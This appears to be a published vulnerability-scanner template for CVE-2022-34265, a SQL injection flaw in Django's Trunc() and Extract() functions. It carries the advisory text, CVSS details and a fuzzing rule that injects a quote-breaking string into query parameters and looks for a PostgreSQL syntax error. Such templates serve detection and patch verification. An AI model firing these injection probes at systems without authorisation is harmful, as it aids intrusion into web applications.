An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
PoC代码[已公开]
id: CVE-2022-34265
info:
name: Django - SQL injection
author: princechaddha
severity: critical
description: |
An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
reference:
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265
- https://nvd.nist.gov/vuln/detail/CVE-2022-34265
- https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
- https://docs.djangoproject.com/en/4.0/releases/security/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-34265
cwe-id: CWE-89
epss-score: 0.92734
epss-percentile: 0.99743
tags: sqli,dast,vulhub,cve,cve2022,django
variables:
rand_string: '{{rand_text_alpha(15, "abc")}}'
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
fuzzing:
- part: query
fuzz:
- "test'{{rand_string}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'syntax error at or near "{{rand_string}}"'
- 'LINE 1: SELECT DATE_TRUNC'
condition: and
- type: status
status:
- 500
# digest: 4a0a00473045022100ec9ecc4ab0117134f6bcfaa9223aeb6ddc60aaac101e90fe89b94565de684df702200476be19316cb1ee65dfe23e8a58c72c9ab17f00902576487ac910541a7813a5:922c64590222798bb761d5b6d8e72950